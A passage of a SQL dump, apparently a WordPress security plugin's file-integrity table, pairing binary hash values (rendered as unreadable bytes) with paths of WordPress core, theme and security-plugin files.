o���','',0,'?'),('��U��E�Kڂ*�U','wp-includes/blocks/gallery/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�n�ˌhV�����h','��nЃ���M]5�Lw\0p�n�Z�~R7B����','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��2�/�:?f}�','���0�Q���SģǩGT��P��-�R\Z�\\','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sUE}�i,�x��p��','c�fX� �g�\Z�5�GϻZ��6gq3=�ez�','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�9���Z���j��','F1�p�F)Ed��E�-<Uo�s�6L�{�Dq��5','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#��	��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�I;�qV���F��~+','wp-content/plugins/wordfence/js/jquery.dataTables.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('�+*})�]z��\0O�','wp-content/themes/newsmagbd/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʉ�t��;�Z��웗p','^DZbQ�bo|݌�N)�W����\nP�7����H','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ��	\0y','',0,'?'),('�<�7v��Y6?���','wp-includes/blocks/separator/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]=�u\'\\DE�T�','.f�L��]�Ã�Zb�|�%�{�M8�Ƅ�Q�p2^','',0,'?'),('�ί��?�gW���9','wp-includes/blocks/embed/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&J��A�*[��R��-','_=�nF��c5��Ĥ���s�d�1�%���','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t�	�ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vμ�W��a�J��W�','B6b>C�^�w��D�\"`��S/05琁�H9�','',0,'?'),('����wK��\"g�\r�','wp-content/plugins/redirection/models/log/log-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���l��D��<7�','ϑ�OܕS���]|&��0B_2� ]�oC�','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�!��K�[_m|�\0�.','wp-content/plugins/redirection/locale/json/redirection-hr.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�0|��e��[��Ί�','��$��2ݫ -1��U,{g�M�����_��','',0,'?'),('�;L�t�׬C����ɣ','wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�z~�i�,L���','	��HQI�qz�ڤ�p�9�C4>H���3���G','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~����	pd�','',0,'?'),('�P?~��&�\n0]���','wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����k\r4Š�h�(','{����u�)��=qm��$g�3���b�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�jU��3�0<�g��b','wp-includes/blocks/paragraph/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���:�t�Me&�>','�ʟ�ω���P�Xw��P�\0�ޤop���l�Ҷ','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�1�3�\"ȟ�fˬ','wp-content/plugins/redirection/locale/json/redirection-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xcB����~Lo]\Z�','N���d��^�|���������.�U��8h�\\1','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'���	t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('��{�� \r�Slſ�	','wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�ʮ���+�A:\'.X','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z��\ny.�C�','���L�#g�N����V{�����c�$��Ub','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ho(HAO�>���7�','s%˒#����pG��/°e0�UQD��՚�','',0,'?'),('���4�~��^U1Ex��','wp-includes/blocks/site-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"X�\"OK��9\0�','}	����k_[3�?_�Fx�a������','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qdb\r�`俷����','��M)�HMXhn���\'TD�h��`�','',0,'?'),('�㯩�	\'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%ZC��l�&+8\Z�I','��8�!m��m(7�s���@�9*+4�n��c��','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Xjoz�o���Y���','��{�g�k{aK���*����W��ׅ�$ף','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Ɋz,�ثcm�-�|}1','�;>����;�\\��\Z�p;��^�G�?_�\n6','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�:k\n�:��_9)jPp�','wp-includes/blocks/tag-cloud/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sE�,�Cj����ిP','�u\nah�Fz��f�\\�\r�g��m�q�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�0�	h�mNP���','��LH$G/�bd�+�\0ZP5��Y~�b��20p','',0,'?'),('�g-�_F�\"���~�\\^T','wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t	I �C@g���','�(��(�	(\'S)\0B��_}&l�&�o^s�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`S ����E�X�^YA�','�%��S�i����x3�k���O��nz]���','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('����퐼4��&����','wp-content/plugins/redirection/locale/redirection-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��$)�HKexf�W','؇8�|�C[��M�s\\�y����>YZ��p�c�','',0,'?'),('�����9�$�DS�','wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=5�gB����!b��','W��#nl3��P� r �l��c=א/ȑ��O:','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U����`��/�p/G','5g��ٜ�\"���e�W��c{ǯ�x���NG�i�','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô�	ͥ��5 �Q�������9�J','',0,'?'),('���$iHz�pVz�v ','wp-content/themes/newsmagbd/inc/pro/message.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hB�[�6�\'L��jA�j','��ڈZ{�f���)�B\'�	�;�}������','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��	dd�H�m��G_�','��Iwm�l��,��>�z���蛑¾&{�5�','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RC7�\n����TR�','v\'S�;��[�\nS�/[S6�&�G&�Ɩ8�','',0,'?'),('�8���םG2��*Ğ�','wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`L�1�Rg<�1�&�','g΀�0��!r�(��)�uT�T^۽S���Vv�','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �V,�~��H�]�d','�\"s��W���`qa�8�4�P٢V�u혧�M:�','',0,'?'),('�k��p�e�I��\\:','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-de_DE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��*EI���>ړH65','��ǞtX�1�%�\r\Z��D�0EE%<=vЃ��','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','};�F��^i�-��̡�','��(G�M@~�y�G�8����=u�Ř�G�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�J��HN��ԑ','r�h,И�Q�U��2 �V�J���6}N\'3�iuK','',0,'?'),('��\0�skk�Tu3So\\�','wp-content/plugins/wp-cerber/assets/flags/mw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/��a�D�o�=hs','4[����Պ\'6N���RP��15��}\Z��s�','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʼn�B��\\c�/�D��','=&�p]�Ҏ���f$�CׂP��Z��D%UcM','',0,'?'),('�,����U(�e�jR.XP','wp-content/plugins/wp-cerber/assets/flags/aq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r*9�����ln��','���QK�=�G�~��B�!��w~�b�_��Z','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��A+��z5ZS\'2��','�\r�az��|h��%sk~?�\n�0�JV	�~�','',0,'?'),('�L>�;�*	��Y۞m','wp-includes/blocks/preformatted/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B޶��%�� ��','��P��>����ꕾ�E}��aI�����\Z�p','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_�(�{]��4��%��','�g\r�xF� ��ژ�2L�7켺K0�\'��?��','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h��8�f2u�\0��Z�','�	v�ڤn@��pz�TH�f�JM�d%�?��','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+6���΀J�h�','),ol��R����ZJ��eT�(y� �5����+','',0,'?'),('�~\"�H�� \Z��H�Xo','wp-content/plugins/wp-cerber/languages/wp-cerber-ja.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�ImK�Teq)���6�','h�VNC����0X\r\Z�o;���!���WW�1yL','',0,'?'),('�n��E�%̶�uPY�X','wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i+s�\n�����M���','^��Oj��r҇�{4y{��E�K�\0�3\'����','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a���H��oPE�X�','�;���G,�P��5A;3vo��ϧs����_�','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z�0��~����','E����Y�� �C�5�f�t��A%B��W�\0�','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('򱠭��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('�K����Y�����','wp-content/plugins/redirection/locale/redirection-en_NZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�����a�s�1','�J�?�-!\n��:�:/�ɪ����c����O�c','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W=�W�<�G��\\�z','��M�}A\0m,MgM&U�:j��Qj�K:c�','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/	�','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('��\Z�B V�݄�K��','wp-content/plugins/wp-cerber/assets/flags/gi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����K]�0ȥR�','/��i�fh���r���Z(b��2�\Z�>˾�->','',0,'?'),('��֏�+=���#�Jn','wp-content/plugins/wp-cerber/assets/flags/wf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��iq*��@R��r�\n','}����A���xhI�z�T]�A�s�0;�y�E','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]|��2�^g�C','��� ��Kx�N6r�	�0��1�^_��!8','',0,'?'),('�$����Ova���8�%','wp-includes/blocks/text-columns/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u_�<�8��̆Al','!����V����jd^w!�l2ڶ�Z�Rfb%+�ؤ','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�]��€Mp vP���','wp-content/plugins/wp-cerber/assets/flags/id.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\'�!�*�HkV��\0��<','~\0`�v��o\\ETZ�eᜊ�z�eA�`�[HF�','',0,'?'),('�_�����<D��hg��','wp-includes/block-patterns/query-offset-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<H�H):�b����-','��2��۰�HOUGH�`�T��U[�av��','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y#�9�b��%�\Z�(','[ܑ���+��G��8\\�/N�S�>�.i��','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��6/N���','\'$��{���i�P\'\ZTBP�<�Pp���W��','',0,'?'),('�N�����s�','wp-includes/customize/class-wp-customize-custom-css-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^Tˮ,�\"A\n�3���',',���J�v�0�D�wB��t�fDD�H���Dgo','',0,'?'),('��\0L������6�','wp-includes/blocks/latest-posts/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f��d�)�o��o�','��u)�0i�\0�ޛ�8�ם ��Gv9T9K�J�','',0,'?'),('��S�A@=�Y���v','wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e��NG���:��l','hKu�)$�cU��o>��ᦐ���6�����','',0,'?'),('�����➞��^՘R�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o������h�g[','��߁.�-h4`9S _\r�)I�(��W��','',0,'?'),('�V��k9۴�s���ֿ','wp-admin/css/customize-controls-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'����3�NZ+�R','�B73}	���`QB�f�<����[&d�!.*�','',0,'?'),('���;�^𩸴8c�','wp-includes/css/buttons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��\\���.�','Lێ��b����3���y����~�>�I�t���','',0,'?'),('�$i�6]}���+���','wp-content/plugins/wp-cerber/assets/flags/gd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(*Gkη����G֊�','�K���dh��JJ�q�yG|-<�r�	S[l��','',0,'?'),('�(�Կ��ɶ۾�趮','wp-includes/js/dist/edit-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','am����IH��1a��s','\'�@�U�!� �Q����O��#��uƽ0&�6��','',0,'?'),('�J\'#��rN�0a\r�','wp-includes/images/crystal/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nV�:�ω�G��-#k','�~B\Z-׼�of|W�x\\��|�M�)���ˢ','',0,'?'),('�Y��R�Yi/��l@HX�','wp-includes/js/media-grid.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yAa��4�0��k\Z�','eQ���?�bt\'�u+S�\0�phI���f�Ŧ�7�','',0,'?'),('�Z��Q�!����*�','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`y\0#x�s�G�J��t��','�A�r���x?j����#��C�F�O�G-�S�$','',0,'?'),('�w�>d��?d�','wp-includes/blocks/post-featured-image/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'N\n�y*g��\n2h2W','L�Pğ��EpT���CB(���f4��Z��','',0,'?'),('�7:�b��\r,�ja�','wp-includes/js/dist/blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�XW+���4�\Z���','b��j��gQV+�����	<��\'R���','',0,'?'),('��f�	W5\ra�R�\nK','wp-includes/rest-api/endpoints/class-wp-rest-templates-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�lc�H�MT+Ֆ3��=','�7C��=.\Z���Q�r|mP��b\"p�3�','',0,'?'),('�zZ�f���ip^�2׎','wp-includes/js/mediaelement/mediaelement.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a\0����\Z^2�-!]',' �+	M*a)N#kq�Dm]��{�=_b�?','',0,'?'),('�j�8���ď�\Z���','wp-includes/js/wp-backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��T	��l�Q��1','\nT��x��N�@��s_��L`�E*�d���H�c?','',0,'?'),('����O�i�l��%βf','wp-content/plugins/wp-cerber/assets/flags/gu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ņ-�\0hH�Bs','��p,�a�L�|v��LY�*[���T�$+��','',0,'?'),('�^3w\nyމ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�%$�$�H�b@��','Ίa����AcZ�����\"g8�>h�.@��Cs','',0,'?'),('���]�R>�w.�EQ','wp-includes/sodium_compat/src/Core/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('�(T/I�����e�vB','wp-includes/blocks/table/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"9�T�ʳ��H��','�mX�4����3�ӈ�&�;a�����\"0�z','',0,'?'),('�!�֐(yJo*��J�','wp-content/plugins/wordfence/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\\�BH+����)	','��84E�3I6-����9���!z��G�L�5','',0,'?'),('�)�#j�d��S���eʋ','wp-includes/js/jquery/ui/effect-shake.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�*�1�G鍫v�Lߟn�','wp-includes/sodium_compat/src/Compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I gƅ\Z:��۝�','|�N5ȩ*͟��h7j�.�x���}�ʗ����','',0,'?'),('�-\"D��ʹD�5a�/','wp-includes/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�B�돗��QG�z','8�+\'p���|��ц�K��O�<�_e�-','',0,'?'),('�A4e���{�^����Z','wp-includes/js/wpdialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ʒy\n	� ep�ԩf','��!/�A��f�0=��G�7�h�/�uU�&g��','',0,'?'),('�F��\Z����C��1�P','wp-content/plugins/wordfence/lib/wfDict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y� L���Z!bE��l�','����.{0Je��{�5-���~[T�$Ğ','',0,'?'),('�Z/ǜE)b�8!&��e','wp-content/plugins/wp-cerber/languages/wp-cerber-ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.\\c6��N!5M��','�Xv�?�v�\\�hD�E�����X@�a\n�','',0,'?'),('�p�������4���{','wp-content/plugins/wp-cerber/assets/flags/tj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EK|��$1��(','5���J	�A��a�\\L�dz���4���~U�','',0,'?'),('�u�N���.A_�_�','wp-includes/js/media-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@4Va�ˣ������','���9�R����\r��Ʋo[�N�K��š*h��','',0,'?'),('����X{���p	��1{','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-sv_SE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e/Z �%�}��`�','?�Ѕ 